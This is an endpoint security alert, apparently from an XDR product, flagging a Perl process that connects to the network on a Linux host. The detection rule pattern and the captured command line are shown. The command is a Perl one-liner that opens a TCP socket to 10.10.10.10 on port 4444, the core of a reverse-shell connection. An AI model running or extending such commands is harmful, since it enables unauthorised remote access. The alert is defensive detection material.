MEDIUM Perl script connecting to network

Detected ID: #37775 | Detected: 2026-01-17 06:20:32 | Execution
Alert Overview

Process action type = execution AND target process cmd = *socket*connect*sock_stream*, *socket*sock_stream*connect* AND target process name = perl

Unclassified
XDR BIOC
New
DS:PANW/XDR Agent DOM:Security
Host Information
inbridge-42
inbridge-42\dsst
Process Information Process Execution
Actor Process (Executor)
Process Name timeout
Path /usr/bin/timeout
PID 553284
SHA256 375eaa8774baf7667515932c4d6fa2e31a2c21e9c50f152a27c4c6a718374ebe
MD5 f919282d021cba6698eb6d7ecca48449
timeout 2 perl -e use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in(4444,inet_aton("10.10.10.10")));
Action Process (Target)
Process Name perl
SHA256 38d70f54fd18d614e9e6cc35c960b45f54e7b991894b8308e704ae9953c86ce4
perl -e use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in(4444,inet_aton("10.10.10.10")));
Parent Process (Causality)
Process Name sshd
Path /usr/sbin/sshd
SHA256 4cc983fa8f3a26626981dbbe79113348fb86cca3ec426f6af5fabd08215fd5e1
MD5 6abd5bb3990d37d6ad2027f5a155af22
sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
Severity Analysis
MEDIUM

Review and assess impact

Summary
Events 1
IP Addresses 1
Tags 2
File Artifacts Yes
Network Artifacts No
Registry Artifacts No
Analyst Verdict